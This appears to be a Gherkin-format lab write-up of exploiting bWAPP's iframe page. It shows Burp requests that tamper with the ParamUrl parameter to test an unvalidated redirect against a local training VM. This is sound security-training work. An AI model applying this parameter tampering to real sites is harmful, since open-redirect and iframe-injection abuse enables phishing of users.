# language: en

Feature: iFrame External Redirection
  From system bWAPP
  From the A10 - Unvalidated Redirects & Forwads
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/iframe.php
  Message: iFrame
  Details:
        - The page it's displaying the content of the robots.txt file
  Objective: Perform an Ext. Redirection
  """

Scenario: Ext. Redirection
  Given the initial page
  Then I send a request to tamper it with Burp
  """
  # Burp Request on iframe.php
  GET /bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250
  HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101\
  Firefox/52.0

  # ParamUrl seems to the parameter to test the ext. redirection
  # it is calling a file inside the project domain, let's see
  # if this is not validated.
  """
  Then I modify the parameter ParamUrl with an url within the project's scope
  """
  # Burp Request Modified on iframe.php
  # Replacing ParamUrl value with: login.php
  GET /bWAPP/iframei.php?ParamUrl=login.php&ParamWidth=250&ParamHeight=250...
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101...
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  # On response we get a redirection
  GET /bWAPP/login.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  # This login.php will be rendered inside the iframe, if we can redirect
  # the user, to a regular url on the project, what migth stop us
  # from redirecting it to a crafted malicious url placed on the
  # project domain?
  """
